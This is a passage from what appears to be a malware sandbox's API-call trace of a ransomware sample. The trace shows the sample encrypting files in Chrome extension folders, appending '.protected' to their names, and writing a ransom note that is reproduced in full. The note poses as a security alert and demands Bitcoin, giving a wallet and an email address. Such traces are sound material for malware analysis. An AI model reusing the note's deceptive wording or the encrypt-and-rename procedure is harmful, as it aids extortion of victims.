lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xaf3, lpOverlapped=0x0) returned 1 [0080.773] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.773] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.774] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.774] CloseHandle (hObject=0x164) returned 1 [0080.774] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected") returned 170 [0080.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0080.774] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0080.774] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.774] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0080.775] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0080.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0080.775] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.777] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.777] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.777] CloseHandle (hObject=0x164) returned 1 [0080.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected") returned 172 [0080.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected")) returned 1 [0080.778] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.778] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.778] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0080.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.786] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.786] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.787] lstrlenA (lpString="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") returned 684 [0080.787] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.787] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.788] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.788] CloseHandle (hObject=0x160) returned 1 [0080.788] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0080.788] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0080.788] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\RESTORE_FILES.txt") returned 147 [0080.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0080.788] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.788] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0080.789] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.789] WriteFile (in: hFile=0x15c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0080.789] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.789] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0080.789] CloseHandle (hObject=0x15c) returned 1 [0080.790] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0080.790] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0080.790] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt") returned 141 [0080.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0080.791] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.791] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0080.792] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.792] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0080.792] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.792] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0080.792] CloseHandle (hObject=0x158) returned 1 [0080.792] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Windows") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Program Files") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Program Files (x86)") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="$Recycle.bin") 
returned 1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="System Volume Information") returned -1 [0080.792] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned 123 [0080.792] lstrcmpW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2=".") returned 1 [0080.792] lstrcmpW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="..") returned 1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*") returned 125 [0080.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0080.793] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\.") returned 125 [0080.793] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.793] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.793] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\..") returned 126 [0080.793] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.793] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.793] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned 133 [0080.793] lstrcmpW (lpString1="1.0.0.2_0", lpString2=".") returned 1 [0080.793] lstrcmpW (lpString1="1.0.0.2_0", lpString2="..") returned 1 [0080.794] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*") returned 135 [0080.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0080.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.799] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\.") returned 135 [0080.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.799] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.800] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\..") returned 136 [0080.800] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.800] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.800] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="Windows") returned -1 [0080.800] lstrcmpiW 
